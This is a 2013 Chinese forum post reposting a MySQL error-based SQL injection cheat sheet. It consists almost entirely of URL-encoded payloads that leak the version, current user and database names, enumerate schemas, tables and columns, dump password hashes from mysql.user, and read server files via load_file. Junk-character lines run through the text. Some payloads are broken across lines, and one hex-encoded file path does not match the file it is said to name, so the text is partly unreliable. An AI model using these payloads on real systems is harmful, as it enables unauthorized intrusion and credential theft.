Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

$ m4 E/ T* ?; D2 q, S: A+ U8 K
, e/ Y3 q* S, B5 y- tMysql暴错注入参考（pdf），每天一贴。。。
/ S5 N, M& d/ ~( u$ ^; o" g5 u
. `1 Y( n: e, k) ]; [MySql Error Based Injection Reference
! ^7 p- [3 i+ C8 h9 }- r7 u% P2 Q# S[Mysql暴错注入参考]
) g! I) z- v. g% wAuthornig0s1992
  Q8 ]3 x/ m: l$ ^7 ?" YBlog:http://pnig0s1992.blog.51cto.com/
$ _& R4 }" C8 ITeAm:http://www.FreeBuf.com/
; ^& O; }, z  C* ]6 L+ ]+ m" oMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
. _* F- @$ F/ P1 W, f( d0 z' Y1 lMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
2 {) L3 I0 S1 I% K查询当前用户:
; i1 {& f; c% f5 f9 \2 V7 J6 m4 nMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
$ E; L7 O8 V4 `2 ?  WMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
; f+ H9 H  J& O: {' F# o! cand(0)*2))x+from+information_schema.tables+group+by+x)a)
! F# q7 _7 L+ k. U$ j6 N7 T  ~查询当前数据库:
7 h. E7 J, }; I) v- X# m" ?Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
9 e1 z, p8 B* s/ a0 G6 Hor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
' d+ E/ [( p4 A; [+ S- u* KLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
) N: J6 J# l: ]6 K顺序替换
爆指定库数目:
7 L8 v  b% d) C7 _and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
2 o. y! f2 l3 X) ^' B; H) kable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
; F* R6 H( b* t- b% }' X6 u, b依次爆表:
  S2 Z) \5 I3 l' Q5 Qand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
/ m* J; O2 _9 `- B% G, ~2 [( F* ]0x6D7973716C=Mysql 将n顺序替换
) r; j, l2 Q  F: t: V4 b$ o- s爆表内字段数目:
1 F3 `5 R& K. Z4 W7 J% f) X6 L: Uand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
% Q) c) ~- @: M( _" p+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
& R! _0 k; p6 @0 p; b6 i' D* d) D+ Q依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
7 B0 L" V5 j3 j: c$ ]ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
7 D9 |# {; D" }6 i" \爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
2 I9 |$ V% M8 ^$ l2 |2 B- nfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
. w+ N$ \' s, Y( ]9 D3 ], _Thx for reading.
* b: n7 Y% B/ F" [. O
不要下载也可以，